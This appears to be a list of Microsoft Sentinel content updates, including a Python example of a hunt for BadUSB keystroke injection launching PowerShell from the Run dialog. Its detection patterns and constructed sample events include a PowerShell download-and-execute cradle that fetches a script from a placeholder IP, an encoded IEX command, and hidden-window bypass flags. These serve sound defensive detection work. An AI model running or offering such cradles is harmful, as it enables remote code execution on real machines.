Azure Security Benchmark Solution: Enhanced Detection Logic and Incident Enrichment (v3.0.5)

Azure Security Benchmark solution updated to v3.0.5 with improved compliance monitoring logic, proper data connector declarations, and enhanced incident alert details. Read More →

Gentlemen Ransomware Campaign: New Hunting Queries for EtherRAT/TukTuk IOCs and Web3 C2 Infrastructure

Two hunting queries were added targeting Gentlemen ransomware campaign artifacts, including payload hashes and the decentralized Web3/SaaS C2 infrastructure used by the EtherRAT and TukTuk malware. Read More →

Logstash Output Plugin: Version 2.2.1 with Enhanced Logging and Security Warnings

Microsoft Sentinel Logstash plugin updated to v2.2.1 with improved batch logging and comprehensive security warnings for vulnerable Logstash versions. Read More →

Workspace Usage Report Workbook: Version 1.6.5 Metadata Update

Workspace Usage Report workbook bumped to v1.6.5 with updated description mentioning Microsoft Sentinel and Defender support. Read More →

LockBit Hunting Query: ActiveMQ Exploit IoC Detection Added

New hunting query provides hash-based detection for LockBit ransomware artifacts deployed via Apache ActiveMQ CVE-2023-46604 exploitation. Read More →

CrowdStrike API Connector: Multi-Domain Support for Enterprise Deployments

CrowdStrike API connector now supports multiple domain configurations with unique aliases, enabling organizations to ingest data from different CrowdStrike instances simultaneously. Read More →

Airlock Digital Solution: Application Control Visibility for Endpoint Security

New CCF connector enables ingestion of Airlock Digital application control logs, providing execution monitoring and file activity visibility to detect unauthorized software execution. Read More →

AWS Security Hub Compliance Workbook: Comprehensive Security Posture Visualization Now Available

New AWS Security Hub compliance workbook provides executive dashboards and operational analytics for security findings, compliance tracking, and multi-account posture management. Read More →

NordStellar CCF Push Connector: Real-time Threat Intelligence Integration Now Available

New NordStellar solution delivers real-time threat intelligence and exposure monitoring via the CCF Push architecture into a unified NordStellar_CL table. Read More →

Entra ID Identity Boundary Expansion: Three New Hunting Queries for Stealthy Persistence

Added three hunting queries targeting identity boundary expansion techniques in Entra ID that escalate privileges without creating new accounts. Read More →

AWS S3 and CrowdStrike Connectors: Non-Analytics Tier Query Support for Basic/Auxiliary Plans

AWS S3 and CrowdStrike Falcon S3 Data Replicator connectors now support Usage table fallback queries for deployments using Basic/Auxiliary Log Analytics plans. Read More →

Bitdefender GravityZone Solution v3.0.1 Adds Incident Analytics for Endpoint and Email Protection

A complete Microsoft Sentinel solution integrating Bitdefender GravityZone multi-vector threat detection, with DCR-based ingestion and XDR correlation. Read More →

ASIM AlertEvent Support Added for Bitdefender GravityZone Security Platform

New parsers enable normalization of Bitdefender GravityZone alert data into Microsoft Sentinel ASIM schema for unified threat detection. Read More →

Sonrai Security CCF Connector: New Cloud Security Posture Visibility

Sonrai Security compliance tickets now integrate directly with Microsoft Sentinel through a new CCF push connector. Read More →

BitSight: Function App to CCF Migration Restores Third-Party Risk Visibility

The legacy Function App connector is replaced with two CCF connectors, so security statistics and events are ingested independently of each other. Read More →

VMware Workspace ONE: New CCF Connector for UEM Device and Application Visibility

VMware Workspace ONE Unified Endpoint Management platform now available in Microsoft Sentinel via CCF connector for device compliance monitoring and shadow IT detection. Read More →

Entra ID Authentication Anomalies: Advanced Hunting for Privilege Abuse and Defense Evasion

Adds a three-query hunting pack detecting legacy authentication bypass, guest account abuse, and privileged operations performed shortly after a password reset. Read More →

Entra ID Account Takeover: Three-Query Hunting Pack for Post-Compromise Detection

Adds a three-query hunting pack targeting device code phishing, service principal persistence, and bulk password resets by privileged actors. Read More →

BadUSB HID Injection Detection: New Hunt for PowerShell via Windows Run Dialog

Adds a hunting query that detects hardware keystroke injectors spawning PowerShell from explorer.exe (the parent process of the Windows Run dialog) with command-line evasion patterns. Read More →
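The shape of that hunt, as an added example that is not the KQL query shipped in the Sentinel content this entry announces: the same logic rendered in Python and run over constructed process-creation events. The field names mirror Defender's DeviceProcessEvents (InitiatingProcessFileName, FileName, ProcessCommandLine), the sample events are made up, and the set of evasion indicators (hidden window, encoded command, execution-policy bypass, no profile, download cradle) is this example's own assumption, not the page's.

```python
"""Hunt for BadUSB-style HID keystroke injection launching PowerShell via the Run dialog.

Added example, not the Sentinel hunting query itself. Event fields mimic
DeviceProcessEvents; all events and indicator patterns below are constructed/assumed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    device: str
    parent: str    # InitiatingProcessFileName
    process: str   # FileName
    cmdline: str   # ProcessCommandLine


# Command-line evasion indicators a keystroke injector typically types (assumed set).
EVASION_PATTERNS = {
    "hidden_window": re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+h(?:idden)?\b"),
    "encoded_command": re.compile(r"(?i)(?:^|\s)-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}"),
    "bypass_policy": re.compile(r"(?i)-e(?:p|x(?:ecutionpolicy)?)\s+bypass\b"),
    "no_profile": re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b"),
    "download_cradle": re.compile(r"(?i)\biex\b|invoke-expression|downloadstring|invoke-webrequest|\biwr\b"),
}

POWERSHELL = {"powershell.exe", "pwsh.exe"}


def evasion_flags(cmdline):
    """Names of the evasion indicators present in a command line, sorted for stable output."""
    return sorted(name for name, rx in EVASION_PATTERNS.items() if rx.search(cmdline))


def hunt(events, min_flags=2):
    """Return (event, flags) for PowerShell spawned directly by explorer.exe, which is what
    a Win+R Run-dialog launch looks like, when the command line carries at least
    min_flags evasion indicators. The threshold suppresses ordinary interactive launches,
    which also have explorer.exe as parent."""
    hits = []
    for ev in events:
        if ev.parent.lower() != "explorer.exe":
            continue
        if ev.process.lower() not in POWERSHELL:
            continue
        flags = evasion_flags(ev.cmdline)
        if len(flags) >= min_flags:
            hits.append((ev, flags))
    return hits


# Constructed sample telemetry (not real log data).
SAMPLE_EVENTS = [
    # User opened PowerShell from the Start menu: explorer parent, no evasion flags.
    ProcessEvent("WS-0001", "explorer.exe", "powershell.exe", "powershell.exe"),
    # Typed by a keystroke injector into Win+R: hidden window, bypass, cradle.
    ProcessEvent("WS-0412", "explorer.exe", "powershell.exe",
                 "powershell -nop -w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
                 ".DownloadString('http://203.0.113.10/a.ps1')\""),
    # Same technique with an encoded command instead of a cleartext cradle.
    ProcessEvent("WS-0087", "explorer.exe", "powershell.exe",
                 "powershell.exe -NoP -W Hidden -Enc "
                 "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"),
    # Evasive command line, but launched from a terminal: outside this hunt's parent filter.
    ProcessEvent("WS-0200", "WindowsTerminal.exe", "powershell.exe",
                 "powershell -nop -w hidden -ep bypass -c whoami"),
    # Single benign-looking switch from explorer: below the default threshold.
    ProcessEvent("WS-0300", "explorer.exe", "powershell.exe", "powershell.exe -NoProfile"),
]


if __name__ == "__main__":
    for ev, flags in hunt(SAMPLE_EVENTS):
        print(f"{ev.device}: {ev.process} <- {ev.parent} flags={flags}")
```

The parent filter is deliberately strict: the Run dialog is a child of explorer.exe, so a launch from a terminal, a scheduled task, or a script host never qualifies, and conversely every Start-menu launch does, which is why the indicator threshold rather than the parent alone decides what is reported. Tune min_flags and the indicator set to the environment before promoting a hunt like this to an analytics rule.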

Microsoft Entra ID OAuth Consent Query: Fixing Zero-Result Bug in High-Risk Permission Detection

Corrects a broken hunting query that returned no results because it filtered on an incorrect property name. Read More →